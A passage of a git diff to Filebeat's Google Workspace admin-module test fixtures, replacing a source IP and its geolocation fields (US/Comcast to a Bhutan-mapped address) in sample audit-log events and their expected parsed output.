- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1177,7 +1093,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"SESSION_CONTROL_SETTINGS_CHANGE\",\"parameters\":[{\"name\":\"REAUTH_APPLICATION\",\"value\":\"ADMIN_CONSOLE\"},{\"name\":\"REAUTH_SETTING_NEW\",\"value\":\"INHERIT\"},{\"name\":\"REAUTH_SETTING_OLD\",\"value\":\"NEVER\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"SESSION_CONTROL_SETTINGS_CHANGE\",\"parameters\":[{\"name\":\"REAUTH_APPLICATION\",\"value\":\"ADMIN_CONSOLE\"},{\"name\":\"REAUTH_SETTING_NEW\",\"value\":\"INHERIT\"},{\"name\":\"REAUTH_SETTING_OLD\",\"value\":\"NEVER\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1192,26 +1108,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 10237,
+ "log.offset": 10216,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1233,7 +1145,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_SESSION_LENGTH\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_SESSION_LENGTH\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1246,26 +1158,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 10774,
+ "log.offset": 10752,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1286,7 +1194,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNBLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"CALENDAR\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNBLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"CALENDAR\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1299,26 +1207,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 11184,
+ "log.offset": 11161,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log
index ff07d024c4c5..f720ee9d4085 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log
@@ -1,5 +1,5 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"ADD_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"DELETE_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES","parameters":[{"name":"SERVICE_NAME","value":"service"},{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SITES_SETTINGS","name":"VIEW_SITE_DETAILS","parameters":[{"name":"SITE_NAME","value":"site"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"ADD_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"DELETE_WEB_ADDRESS","parameters":[{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES","parameters":[{"name":"SERVICE_NAME","value":"service"},{"name":"SITE_LOCATION","value":"/path/in/url"},{"name":"WEB_ADDRESS","value":"http://example.com/path/in/url"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SITES_SETTINGS","name":"VIEW_SITE_DETAILS","parameters":[{"name":"SITE_NAME","value":"site"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json
index ba25dbc3e682..b01010f11ab4 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json
@@ -8,7 +8,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"ADD_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"ADD_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "creation"
@@ -26,23 +26,19 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -67,7 +63,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"DELETE_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"DELETE_WEB_ADDRESS\",\"parameters\":[{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "deletion"
@@ -82,26 +78,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 594,
+ "log.offset": 593,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -127,7 +119,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -143,26 +135,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1191,
+ "log.offset": 1189,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -184,7 +172,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES\",\"parameters\":[{\"name\":\"SERVICE_NAME\",\"value\":\"service\"},{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES\",\"parameters\":[{\"name\":\"SERVICE_NAME\",\"value\":\"service\"},{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -196,26 +184,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1723,
+ "log.offset": 1720,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -240,7 +224,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"VIEW_SITE_DETAILS\",\"parameters\":[{\"name\":\"SITE_NAME\",\"value\":\"site\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"VIEW_SITE_DETAILS\",\"parameters\":[{\"name\":\"SITE_NAME\",\"value\":\"site\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "info"
@@ -252,26 +236,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2233,
+ "log.offset": 2229,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log
index bed874fc9a42..7caea410de55 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log
@@ -1,74 +1,74 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GENERATE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
